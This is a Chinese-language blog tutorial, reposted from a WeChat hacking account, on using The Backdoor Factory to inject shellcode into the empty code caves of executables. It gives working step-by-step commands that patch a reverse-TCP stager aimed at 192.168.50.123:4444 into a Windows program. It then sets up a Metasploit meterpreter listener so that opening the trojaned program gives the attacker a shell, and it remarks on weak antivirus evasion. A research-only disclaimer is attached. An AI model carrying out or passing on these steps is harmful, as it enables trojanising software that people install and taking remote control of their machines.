The Backdoor Factory
即后门工厂,是一款简单实用的后门构造工具,支持Windows PE和Linux ELF两种运行机制的可执行文件,BDF
的目标是让攻击者所提供的shell代码对可执行二进制文件进行补丁,在正常运行的软件中添加shell。
其原理是在可执行二进制文件中有大量的00
,这些00
是不包含数据的即无意义的,那么就可以将这些数据替换成payload
,并且在程序执行的时候,JMP到代码段来触发payload
。
🎡工具特点:
-
目标文件会被拷贝并且打上补丁 -
注入反弹脚本 -
修改PE/COFF头以为所有的WIN32 DLL增加附加选项 Kali官网中的介绍:https://tools.kali.org/exploitation-tools/backdoor-factory
项目地址
:https://github.com/secretsquirrel/the-backdoor-factory
🍉牛刀小试
#下载项目
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
#帮助文档
./backdoor.py -h
检测是否支持后门植入,这里以IPOP.exe
为例:
./backdoor.py -f ~/IPOP.exe -S
测试裂缝空间
size 150
:
./backdoor.py -f ~/IPOP.exe -c -l 150
查看可用payload:
./backdoor.py -f ~/IPOP.exe -s show
插入payload,并生成文件:
./backdoor.py -f ~/IPOP.exe -H 192.168.50.123 -P 4444 -s iat_reverse_tcp_stager_threaded
在msf中开启本地监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.50.123
set lport 4444
exploit -j
当我们打开软件时,在msf中也会得到反弹。
🏀总结
利用BDF
我们可以很轻松的在exe
文件中植入后门。对初学者来说很友好,但是其缺点也很明显,就是程序中必须存在大量的00
,这对植入的软件也就有了要求,并不是所有的软件都可植入,同时在测试过程中发现免杀效果也不是很好。但是对于我们学习和研究足够了。
原文始发于微信公众号(kali黑客笔记):利用The Backdoor Factory给软件添加Shell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论